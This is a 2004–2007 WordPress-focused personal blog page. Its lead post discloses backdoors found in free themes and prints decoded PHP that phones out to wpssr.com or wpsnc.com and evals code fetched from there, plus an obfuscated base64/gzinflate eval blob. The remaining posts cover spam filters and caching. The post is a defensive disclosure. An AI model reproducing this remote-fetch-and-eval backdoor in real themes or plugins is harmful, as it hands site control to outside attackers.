Teh Blarg » wordpress

Wordpress Theme Arbitrary Code Execution

Raybdbomb — Tue, 04 Dec 2007 05:26:23 +0000

A friend of mine has a Wordpress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper, and saw this in his theme’s header.php (I added the newlines for displaying purposes)

Which decodes to (again with the newlines)

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
 $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
 $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
 @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  $R3E33E017CD76B9B7E6C7364FB91E2E90 =
 @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  @readfile($R6E4F14B335243BE656C65E3ED9E1B115); }
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php

eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
')));

Which doesn’t turn out to be as bad, only few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted, they don’t need any more pagerank. Who knew people were so shady. I urge those looking to get Wordpress Themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.

Beta Testing Defensio

Raybdbomb — Wed, 10 Oct 2007 21:09:51 +0000

Akismet isn’t perfect. I’ve been using it to block my spam since it became available. One of its major problems is that it often lets through what Defensio calls URL-less spam, and sometimes less through spam WITH urls, which I don’t quite understand.

Anyway, so right after this post, I’ll be disabling Akismet and turning on Defensio Beta. I’ll be monitoring spam incoming, ham incoming, speed of page loads, etc. If you notice anything funky, let me know

Testing WP-Cache

Raybdbomb — Thu, 04 Oct 2007 06:01:45 +0000

This is only a test

If there are any problems, please let me know!

Akismet Annoyances

Raybdbomb — Wed, 27 Jun 2007 18:47:17 +0000

I use Akismet on my Wordpress site to catch spam. At first I was very impressed with it. When I first installed it (a few weeks after it was announced), it worked very well; it would catch all spam and let all ham through. I’ve made sure to have the latest version of the Akismet plugin for Wordpress installed. Since 99% of the spam determining is done on the akismet server side, there haven’t been any client side updates in some time. My Akismet setup has caught 25,521 spam comments so far.

But recently, it has been misbehaving on my site and the sites of some of my friends that use it. I get 5-10 spam comments a week that Akismet thinks is ham, and every once in awhile I’ll get a ham comment that Akismet thinks is spam. Then it will place SOME items in moderation which are VERY obviously spam (100+ links).

It’s annoying, and I wish Akismet would get it together. For now, I’ll be patient and keep flagging comments accordingly. After all, there’s still nothing better…

Edit: I found an announcement for Defensio, which could be an Akismet replacer. I requested information and perhaps inclusion in the beta. This sounds promising.

Wordpress performs poorly.

Raybdbomb — Thu, 22 Mar 2007 21:10:11 +0000

When I first came into web development and blogging, I thought Wordpress was great. It handled many of the things that I needed handling, and it did it intuitively and fairly quickly. Since then I’ve had lots of experience with lack of performance, and optimizing web code for performance. Let’s face it, we don’t all have dedicated quad cores for webhosting, nor do we necessarily have separate boxes for DB server and webserver.

Wordpress is not optimized for large amounts of traffic. There is seemingly no caching (within Wordpress) whatsoever. On a normal pageload it makes no fewer than 10 trips back to the database. That’s why if you see a non protected Wordpress site “dugg”, or “slashdotted”, it will be down after only a moderate number of concurrent hits.

WP-Cache is a plugin for Wordpress that caches pages and posts, not requiring Wordpress to hit the database upon pageloads. I couldn’t get it to work with my Wordpress setup after about a half hour of tinkering, but in theory that would make Wordpress a robust, non-performance-hog piece of software. But the point is that there should be no excuses to creating poorly performing code. There shouldn’t have to be a user-submitted-tweak that “fixes” software to not be slow.

Maybe we’ll see it when the Wordpress team finally considers it high priority, perhaps by Wordpress version 5.9.2.

Wordpress and Custom .htaccess

Raybdbomb — Tue, 12 Jul 2005 15:59:43 +0000

I’ve found that there is a problematic combination involved with a server-writeable .htaccess file, and a .htaccess file that you have modified. If you put in your own custom edits; for example a download redirection script, then click the Options -> Permalinks section of the weblog control panel, it will overwrite anything you have done to the .htaccess file “automagically” (even without clicking the “Update Permalink Structure” button).

This might be a feature, but has caused me many a headache. So, since I doubt I’ll be changing my permalink structure anytime soon, I made it unwriteable.

New Spam Moderation – Bad Behavior

Raybdbomb — Tue, 28 Jun 2005 22:30:51 +0000

I’ve installed Bad Behavior Wordpress plugin for moderation of my comment spam. Everyone raves about it, so we’ll see how good of a job it does .

I’ve removed Spam-Karma, which is what I was previously using.

Edit 6/29:
This alone does not work. It looks like not all spammers are caught by bad behavior:

Each one having the text
Name ????
E-mail pocket.bikes@108bikes.com
Homepage zz51.51.net (IP: 222.183.141.57 )
Message: zz51.51.net

I’m turning Spam-Karma back on…

Upgraded to Wordpress 1.5

Raybdbomb — Tue, 15 Feb 2005 09:11:25 +0000

I upgraded to Wordpress 1.5… and I lost some stuff… and some stuff didn’t come over right .

Edit: I can’t get my referrals to work after about 5 minutes of trying. The database is handled differently now so it won’t let me just make queries… poo. I might look at it later.

Switched “theme” to silver is the new black.

Added Spam Karma

Raybdbomb — Wed, 12 Jan 2005 03:36:39 +0000

I get a little spam, not too much. I’m taking efforts against it. It was suggested to me to install spam-karma, so that’s what I did.

Blogtime plugin Activated

Raybdbomb — Fri, 24 Dec 2004 01:22:00 +0000

I added a plugin for wordpress called blogtimes. It looked pretty cool on others’ sites, so lets see if it looks cool on mine too